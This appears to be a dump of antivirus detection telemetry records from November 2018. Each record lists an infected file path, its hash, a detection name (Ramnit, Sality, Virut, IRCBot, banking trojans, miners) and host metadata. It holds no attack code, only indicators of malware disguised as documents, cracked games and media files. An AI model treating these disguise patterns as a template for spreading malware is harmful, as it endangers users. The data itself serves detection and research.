  Row(detection=Row(filename='avscan-20181101-154646-6484725d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154646-6484725D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T23:11:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:35:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prosedur - prosedur.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\PROPOSAL LPA\\LPA PROSEDUR - PROSEDUR\\PROSEDUR - PROSEDUR.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152039-1997905b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151312-DB3E0F68\\AVSCAN-20181101-152039-1997905B', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105933-4e63272e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105713-3526A361\\AVSCAN-20181101-105933-4E63272E', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nc 36.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\TEMUAN CAP AEON\\NC 36\\NC 36.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160148-fc5125f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160148-FC5125F7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2481455\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\grand-theft-auto-vice-city_3368427903.exe', parentsize=2401560, timestamp='2018-11-01T00:27:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ole db.exe', filepath='D:\\DATA_SHARE\\program\\unused\\APR_15\\ERP\\Common\\System\\OLE DB\\OLE DB.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155624-c5daa603', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155624-C5DAA603', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách tập huấn xlhc.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\danh sách tập huấn xlhc.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='640434aa3e4841d8960d6351053691f5247bbf502519670db068d8e6bc32edfe', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{3EBF898E-6BAB-4161-B420-37443DC0569C}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='6ebbbdca14d6cba5f9e4fd4285f89e761d9b468aa87c8756f541a0f1129b1420', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110759-e401f695', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110759-E401F695', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rome2.dll', filepath='C:\\Users\\X\\Desktop\\Total War Rome II Emperor Edition\\Rome2.dll', filesize=26752000, name='W32/Ramnit.CD.#M1.#R1'), hash='6e3e48dfcf4df4d9d268e8d8efb719f659d28431a00e22447bf0b51bcefbd8af', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-01T15:04:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nspDD3A.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:11:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123058-59bfa0f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123036-47942935\\AVSCAN-20181101-123058-59BFA0F0', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:30:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111630-246a8aba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111630-246A8ABA', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163156-aa05016e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17c53a39\\AVSCAN-20181101-163139-A6E8024E\\AVSCAN-20181101-163156-AA05016E', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xocr32b.exe', filepath='C:\\Program Files (x86)\\Sharp\\Sharpdesk\\XOCR32B.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='dc650ca8ee0ebfc411d42c34f29d868dfcb6cf2a591b9feb71920e7312c55483', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:cq+iK4ml30qBCagj.1', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T02:06:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080956-8b0c26df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-080956-8B0C26DF', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='006-[s] - faith.exe', filepath='E:\\music\\music\\Vampires 652 P\\006-[S] - FAITH\\006-[S] - FAITH.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='d47f7a8804e9b881bef83bd6fc4dcec7d51f267be1218295ad32e186be27fef6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:13:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deldrv.exe', filepath='\\\\?\\E:\\Daiver Printer\\Canon MX328\\win\\XPS\\x86\\DrvSetup\\DelDrv.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='5a0ca1f2a1226da6571a0466d7f0e0c35957f38aba1e52ee029fb018da5b2fbd', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173442-5a390cb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41d4bab7\\AVSCAN-20181101-173411-555FA24B\\AVSCAN-20181101-173442-5A390CB3', filesize=2048000, name='HEUR/APC.#M1.#R1'), hash='b500de581700356962520b312158252db75db6d474ca8fd27f413334d366ed1a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:34:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cyberlink.exe', filepath='C:\\Users\\X\\CyberLink\\CyberLink.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:31:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c069697_cip (1).exe', filepath='C:\\Users\\X\\Downloads\\C069697_CIP (1).exe', filesize=3264000, name='HEUR/AGEN.1012080.#M1.#R1'), hash='69654e61c99fc6f174639055061f6b02c6a86592d763b0170c651affd89eae0a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T15:12:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='87b7bc1fff4921e3fe17e16205775db32518d705', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\87b7bc1fff4921e3fe17e16205775db32518d705', filesize=3008000, name='W32/Sality.AT.#M1.#R1'), hash='be5b4508ac5e024a323529c4fd5737b3e52cd3354e4f03924e1c762f5b6417ac', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:10:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='agm.dll', filepath='C:\\PROGRAM FILES\\Adobe\\Acrobat 9.0\\Acrobat\\AGM.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='cc465ed7f2e62b4ab474979ff5ecd27af4da2969c06384a4db099a2c34e25d9f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T08:15:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111959-3ed24f6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111959-3ED24F6E', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 11 lançamento 2015 -=mp3=-.exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 11 Lançamento 2015 -=Mp3=-.exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:11:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new folder.exe', filepath='\\\\NERA001\\Stock Sim รวม\\New Folder.exe', filesize=1536000, name='TR/Patched.Ren.Gen.#M300.#R3264'), hash='1c4a096765790c142a8d5727b5cfc4191c090afb49dc9a6b9be6bca4ebfddd4a', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T07:38:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:51:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='play cracked.exe', filepath='E:\\123\\Minecraft - Collection\\play cracked.exe', filesize=192000, name='TR/Rogue.192000.9.#M1.#R1'), hash='767e7cef883679bed2576504ca4cf079d8cf48360f85e2d79fc4d41f73a2610e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T06:48:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-053435-26173cbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-053435-26173CBD', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:34:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Yeni klasör\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Yeni klasör\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:48:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180619-b4dbf584', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6682cceb\\AVSCAN-20181101-180558-B26F9511\\AVSCAN-20181101-180619-B4DBF584', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:06:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170458-84fa393a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bd561203\\AVSCAN-20181029-071119-BE26F8EF\\AVSCAN-20181101-170458-84FA393A', filesize=776000, name='PUA/SearchProtect.#M1.#R1'), hash='4fd7a9ab1f64546bbc69a2a5dd03c67d8d89d06d28eac713253d77fa44eecc81', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:04:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160402-1aa5b314', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_20bba27a\\AVSCAN-20181101-160132-3B6207F7\\AVSCAN-20181101-160402-1AA5B314', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160653-3dda92f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-160645-3CD94395\\AVSCAN-20181101-160653-3DDA92F5', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:06:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181315-cfab4d67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_39003524\\AVSCAN-20181101-180857-ABAED53B\\AVSCAN-20181101-181315-CFAB4D67', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:13:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='52d63506e30f7217257625b20bdf6b4b85b6b4ee6b8213c66720b6d153f6df9e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\52D63506E30F7217257625B20BDF6B4B85B6B4EE6B8213C66720B6D153F6DF9E', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='52d63506e30f7217257625b20bdf6b4b85b6b4ee6b8213c66720b6d153f6df9e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:13:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:41:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:50:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:56:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T18:37:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:40:27Z'), dt=datetime.date(2018, 11, 1)),
